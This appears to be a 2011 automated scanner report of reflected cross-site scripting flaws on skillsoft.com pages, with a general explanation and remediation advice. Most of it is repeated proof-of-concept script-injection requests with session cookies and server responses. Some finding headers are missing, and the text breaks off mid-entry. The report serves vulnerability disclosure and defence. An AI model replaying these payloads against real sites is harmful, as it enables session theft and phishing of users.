Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://skillsoft.com/Books24x7/Product_Information/Collections/AnalystPerspectives.asp [name of an arbitrarily supplied request parameter]next
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eebdf"><script>alert(1)</script>ab1c579f3c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/AnalystPerspectives.asp?eebdf"><script>alert(1)</script>ab1c579f3c6=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47967 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bad5"><script>alert(1)</script>bc7bafa3339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/BusinessPro.asp?4bad5"><script>alert(1)</script>bc7bafa3339=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46491 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.3. http://skillsoft.com/Books24x7/Product_Information/Collections/ElémentsEssentielsFrançais.asp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20033"><script>alert(1)</script>a4fb581aa52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/El.mentsEssentielsFran.ais.asp?20033"><script>alert(1)</script>a4fb581aa52=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45910 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4db"><script>alert(1)</script>01c4bb5b35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/EngineeringPro.asp?2e4db"><script>alert(1)</script>01c4bb5b35a=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46903 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406a1"><script>alert(1)</script>d4ec6ae3e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/ExecBlueprints.asp?406a1"><script>alert(1)</script>d4ec6ae3e86=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45997 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 689e7"><script>alert(1)</script>b76be40a9eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/ExecSummaries.asp?689e7"><script>alert(1)</script>b76be40a9eb=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48246 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35e0"><script>alert(1)</script>66f0f950c8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/FinancePro.asp?c35e0"><script>alert(1)</script>66f0f950c8f=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45468 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67425"><script>alert(1)</script>d058b7dac87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/German.asp?67425"><script>alert(1)</script>d058b7dac87=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45941 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f3f7"><script>alert(1)</script>4f85686a10a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/GovEssentials.asp?1f3f7"><script>alert(1)</script>4f85686a10a=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44414 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3e0"><script>alert(1)</script>0420a192829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/ITIL_B24.asp?1a3e0"><script>alert(1)</script>0420a192829=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44704 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58447"><script>alert(1)</script>bcc1bfa0dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/ITPro.asp?58447"><script>alert(1)</script>bcc1bfa0dc=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46351 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8436"><script>alert(1)</script>af1f1861c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/ManagerSuite.asp?a8436"><script>alert(1)</script>af1f1861c19=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45183 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.13. http://skillsoft.com/Books24x7/Product_Information/Collections/OfficeEssentials.asp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8278b"><script>alert(1)</script>797c3071add was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/OfficeEssentials.asp?8278b"><script>alert(1)</script>797c3071add=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44629 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a9f"><script>alert(1)</script>84db274ee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/Oracle.asp?e0a9f"><script>alert(1)</script>84db274ee86=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 43877 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91235"><script>alert(1)</script>b05454c9d6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/Spanish.asp?91235"><script>alert(1)</script>b05454c9d6e=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46282 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.16. http://skillsoft.com/Books24x7/Product_Information/Collections/WellBeingEssentials.asp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42397"><script>alert(1)</script>6bc16219b9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/WellBeingEssentials.asp?42397"><script>alert(1)</script>6bc16219b9d=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44494 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f964"><script>alert(1)</script>ac679aaca8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Books24x7/Product_Information/Collections/default.asp?1f964"><script>alert(1)</script>ac679aaca8a=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45091 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.18. http://skillsoft.com/about/awards.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/awards.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc01"><script>alert(1)</script>a718b112bb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/awards.asp?edc01"><script>alert(1)</script>a718b112bb1=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45654 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:43:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.19. http://skillsoft.com/about/case_studies.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/case_studies.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e61"><script>alert(1)</script>95470158500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
